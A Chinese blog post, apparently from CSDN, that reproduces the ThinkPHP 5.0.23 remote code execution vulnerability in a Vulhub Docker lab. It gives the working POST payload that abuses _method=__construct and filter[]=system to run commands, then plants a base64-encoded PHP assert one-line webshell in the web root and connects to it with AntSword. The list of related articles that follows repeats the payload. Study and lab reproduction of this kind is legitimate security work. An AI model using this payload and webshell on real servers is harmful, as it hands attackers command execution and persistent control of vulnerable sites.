ThinkPHP5 5.0.23远程代码执行漏洞复现

最新推荐文章于 2024-03-01 00:46:26 发布
最新推荐文章于 2024-03-01 00:46:26 发布
阅读量477 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: 网络安全 安全架构 web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51641247/article/details/129594063
版权

漏洞介绍

ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

进入漏洞目录/vulhub-master/thinkphp/5.0.23-rce#

启动环境

  1. 需要修改配置文件,docker-compose.yml ,将版本3.0改为2

 vi docker-compose.yml

  1. 环境下载

环境安装 docker-compose up -d

  1. 查看镜像运行 docker-compose

漏洞复现

  1. 使用POST传参,可以使用burpsuit或者hackbar

访问 index.php?s=captcha 页面出现报错信息。

  1. 使用hackbar插件发送post请求:执行whoami命令,爆出用户信息

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

  1. 查看文件目录

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

  1. 命令执行成功,上传一句话木马

aaa<?php @assert($_POST['root']);?>bbb

需要进行base64编码,编码后内容如下红色字体,蓝色为上传的目录及文件名

echo YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3Jvb3QnXSk7Pz5iYmI= | base64 -d >>/var/www/public/1.php

上传后访问1.php,成功回显aaabbb,文件解析成功

  1. 使用蚁剑进行连接,成功访问到目录

复现成功

-飞飞鱼
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp5.0.23 rce
Continuejww的博客
02-23 518
ThinkPHP是中国使用极其广泛的PHP开发框架。在其 5.0
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
Thinkphp5.0.23 rce远程代码执行)的漏洞复现
热门推荐
陈瘦瘦的迪迦的博客
12-08 1万+
Thinkphp5.0.23 rce远程代码执行)的漏洞复现 漏洞形成原因 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞如何利用 1、访问靶机地址+端口号 进入首页 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&meth
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2352
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
网络安全深入学习第二课——热门框架漏洞RCEThinkphp5.0.23 代码执行
p36273的博客
09-16 1221
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 2790
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 7453
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1815
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 392
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
四、【漏洞复现ThinkPHP5.X存在远程代码执行漏洞 (thinkphp 代码执行 CNVD-2018-24942)
weixin_52351575的博客
09-20 311
漏洞是因为框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。进一步分析发现,某些ThinkPHP版本不受已公开的POC的影响,这是由于该POC缺乏完备性考虑。由于这段请求中的参数值包含了目录遍历和反斜杠,可能存在安全风险,因此需要进行安全性分析和防护措施。根据参数的值可以推测这是一个针对ThinkPHP框架的请求,其中​。​函数是一个PHP内置的函数,用于执行系统命令。这段请求是一个GET请求,请求的URL路径是​。这段请求的目的是调用​。​​,查询参数包括​。
Thinkphp框架漏洞--->5.0.23 RCE
最新发布
huohaowen的博客
03-01 1297
本篇文章来讲一下thinkphp的框架漏洞
thinkphp5.0.23
weixin_51558394的博客
08-17 1653
thinkphp 5.0.23远程代码执行
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 1760
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 944
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
thinkphp5.0.23rce漏洞复现
09-22
漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值